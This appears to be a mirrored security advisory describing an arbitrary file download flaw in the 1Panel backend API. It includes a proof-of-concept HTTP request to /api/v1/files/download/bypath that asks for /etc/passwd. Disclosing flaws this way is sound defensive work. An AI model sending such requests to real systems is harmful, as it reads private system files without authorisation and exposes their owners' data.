1Panel Arbitrary File Download vulnerability

Main / 1Panel Arbitrary File Download vulnerability

Discription

### Summary
Any file downloading vulnerability exists in 1Panel backend.

### Details
Authenticated attackers can download arbitrary files through the API interface. This code has unauthorized access.
![image](https://user-images.githubusercontent.com/116613486/257246024-d0e35800-5fd8-4907-8b1b-504afaad859e.png)

### PoC
payload:

POST /api/v1/files/download/bypath HTTP/1.1
Host: ip
Content-Type: application/json

{“path”:”/etc/passwd”}

![f77959349e96543436eea18283fa75c](https://user-images.githubusercontent.com/116613486/257245459-13f2f31b-fcfe-4a27-ba52-e2f1e5d4d749.png)

### Impact
Attackers can freely download the file content on the target system. This will be caused a large amount of information leakage.Read More

References

Back to Main

Subscribe for the latest news: